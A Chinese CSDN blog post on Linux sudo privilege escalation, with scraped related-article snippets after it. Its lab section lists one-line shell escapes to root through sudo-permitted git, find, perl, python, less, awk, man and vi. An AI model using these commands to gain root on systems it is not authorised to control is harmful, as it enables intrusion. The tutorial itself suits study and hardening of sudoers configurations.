sudo提权

最新推荐文章于 2023-08-21 19:40:18 发布
最新推荐文章于 2023-08-21 19:40:18 发布
阅读量1.3k 收藏 1
点赞数
文章标签: 服务器 linux 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ljj20020718/article/details/131823768
版权
文章介绍了Linux系统中sudo命令的用途,允许普通用户执行root命令以降低管理员风险。然而,文中探讨了多种利用sudo权限配置进行提权的方法,如通过git、find、perl、python、less、awk、man和vi等工具,这些潜在的安全漏洞可能被恶意用户利用以获取root权限。
摘要由CSDN通过智能技术生成

sudo简介:sudo是linux系统的管理命令,其允许系统管理员让普通用户执行一些或者全部的root命令。这样可以减少root用户的登陆。sudo权限的配置文件位于/etc/sudoers,当普通用户使用sudo命令时,linux系统会在sudoers文件中查找当前用户,根据当前用户权限配置来决定是否可以运行相关命令。权限配置的格式如下:

实验环境准备,对sudoers文件进行如下配置,其中ljj是普通用户

 利用git来进行提权,输入sudo git help config,然后输入!/bin/bash即可成功切换为root用户

sudo git help config

!/bin/bash

 

利用find来提权:sudo find anyfile -exec /bin/bash \; 

利用perl提权:sudo perl -e 'exec "/bin/bash";'

 

利用python提权:sudo python -c 'import pty;pty.spawn("/bin/bash")' 

利用less提权:输入sudo less /etc/hosts浏览文件内容时,在底部输入!bash可切换到root权限的shell

利用awk提权:通过调用linux的system函数来打开bash

利用man提权:通过sudo man man命令打开man使用手册,同时会进入编辑行,输入!bash回车即可获得root权限

利用vi提权:通过sudo vi会进入默认页,输入:!bash回车即可获得root权限

 

 

 

 

 

 

 

 

JayJay_Lin
关注
sudo用户提权
weixin_41648905的博客
07-21 1365
用户提权运维工作中,想指定部分用户可以进行部分管理权限,又不想告诉其密码时,可以用sudo命令来提升指定部分用户的权限。这个需要root账号来授权 有步操作来提权 1.在配置文件/etc/sudoers中,添加修改来授权 授权记录的基本配置格式为 user MACHINE=COMMANDS *user 被授权的用户,也可以用‘%组名’的形式授权一个组的所以用户 *MACHINE 主机名 在哪台主机上授权 *COMMANDS 命令 授予用户可以执行的操作命令,需要是命令的绝对路径,多条命令用‘,’隔开 每
Linuxsudo提升权限(入门)
最新发布
m0_73726899的博客
08-08 926
sudo命令以系统管理者的身份执行指令,也就是说,经由 sudo 所执行的指令就好像是 root 亲自执行。
sudo提权详解
redwand的博客
01-06 9607
一、sudo命令 二、渗透提权思路 三、蓝队防御思路
windows下的 Nsudo提权工具,支持system权限
02-05
【标题】:Windows下的Nsudo提权工具,支持System权限 在Windows操作系统中,权限管理是安全模型的重要组成部分。默认情况下,用户账户通常只拥有有限的权限,以防止无意或恶意的操作导致系统不稳定。然而,在某些...
NSudo提权工具最新版
07-24
【NSudo提权工具最新版】是一款用于系统权限提升的实用工具,主要针对Windows操作系统设计。在Windows系统中,通常用户账户的操作权限受到限制,不能对系统关键组件进行修改或执行某些高级操作。这时,NSudo便能发挥...
Linux曝出Sudo提权漏洞 任意用户亦可运行root命令
09-14
最近,一个名为"Sudo提权漏洞"的问题被曝光,这使得任何用户,即使在配置中明确禁止root用户访问,也能在Linux系统上以root权限执行任意命令。 Sudo的工作原理是基于一个名为/etc/sudoers的配置文件,这个文件定义...
sudo提权项目详细笔记文档总结
07-02
sudo 提权项目详细笔记文档总结 本文档总结了sudo 提权项目的详细笔记,包括项目需求、收集员工职能和对应权限sudo 设置注意事项、模拟创建用户角色实践等方面的知识点。 一、项目需求 sudo 提权项目的主要需求...
sudo提权自动输入密码--java执行交互式命令
05-31
参考了java版的expect4j,expectj的原理,进行了极大的简化,可完成基本的功能: 1,运行java代码,执行交互式命令 2,sudo提权,自动输入密码(echo "password" | sudo -S mkdir /opt/test)
Linux sudo 命令提权
孤独,平庸,落魄
07-06 2648
Linux sudo 命令提权 当我们需要用root用户来进行一些操作的时候,每次又不想切换到root用户下,可以给普通用户提权达来达目的。 1,修改配置文件 vim /etc/sudoers,在root这行下添加 user ALL=(ALL) ALL。 2,设置完成后,就可以sudo 命令 进行提权操作了。 3,如果你想每次提权的时候都输入普通用户的密码,就把wheel前边的# 注释去掉。 4,如果你想提权的时候不输入密码,就找到 %wheel ALL=
Linux提权——SUDO
negnegil的博客
09-03 8826
使用Sudo权限提升Linux账户权限Linux/Unix中,/etc/sudoers文件是sudo权限的配置文件,其中储存了一些用户或组可以以root权限使用的命令。如下图 Sudoer文件语法 假如我们(root用户)要给普通用户test分配sudo权限,请输出vim /etc/sudoers打开文件进行编辑,找到root权限root ALL=(ALL:ALL) ALL,在下一行输入 test ALL(ALL:ALL) ALL,保存后退出,这样即表示用户test可以使用sudo调用root权
linux sudo提权
weixin_30371875的博客
11-09 183
对于可以sudo的用户,就可以获得root权限,具体方法如下: 1.sudo vi 提权 sudo vi filename 在vi的命令行输入:!sh 进入shell 使用id查看,发现是root权限 2.sudo more 提权 sudo more filename 输入!sh 进入shell 使用id查看 3.sudo less提权 sud...
Linuxsudo提权(简单明了一看就会!!!)
Aprilqxs的博客
06-03 1503
abc组 可以以tom用户的身份在server1主机上无密码执行 rm -rf , remove , del 命令。#abc 用户可以以任何用户身份在任何主机上无需密码的执行mkdir和useradd命令。#ABC用户可已在以任何用户身份在任何主机上 无需密码的执行任何命令。如果有用户需要做提权,就在这行下照格式写一行配置就OK了~用户 用户=(主机名) 命令列表。字段4(也就是最后的ALL): 执行的命令。字段2(ALL=):以哪个用户的身份。希望这些知识点对大家有帮助~~~~
linux 提权-sudo提权
mingyqf的博客
10-26 2248
sudo -l 前言 最近听闻sudo刚刚出来了新漏洞,而最近正好在看linux提权这块知识点。借此梳理一下sudo提权相关的姿势。 简介 sodu 全称 Substitute User and Do,用来临时赋予root权限运行某个程序。 sodu 的执行原理: 普通用户执行命令时,首先检查/var/run/sudo/目录下是否有用户时间戳,centos检查/var/db/sudo/目录,并检查是否过期。如果时间戳过期,就需要输入当前用户的密码。输入后检查/etc/sudoers配置文件,查看用.
提权sudo.
花海~
08-21 193
sudolinux下常用的允许普通用户使用超级用户权限的工具,允许系统管理员让普通用户执行一些或者全部的root命令。
sudo提权配置与用户角色管理实践
"这篇文档详述了如何在Linux系统中安全地使用sudo进行权限管理,以满足企业中不同角色的运维、开发和网络管理需求,同时确保系统的安全性。" 在IT运维领域,sudo是一个关键的工具,它允许普通用户以超级用户root的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值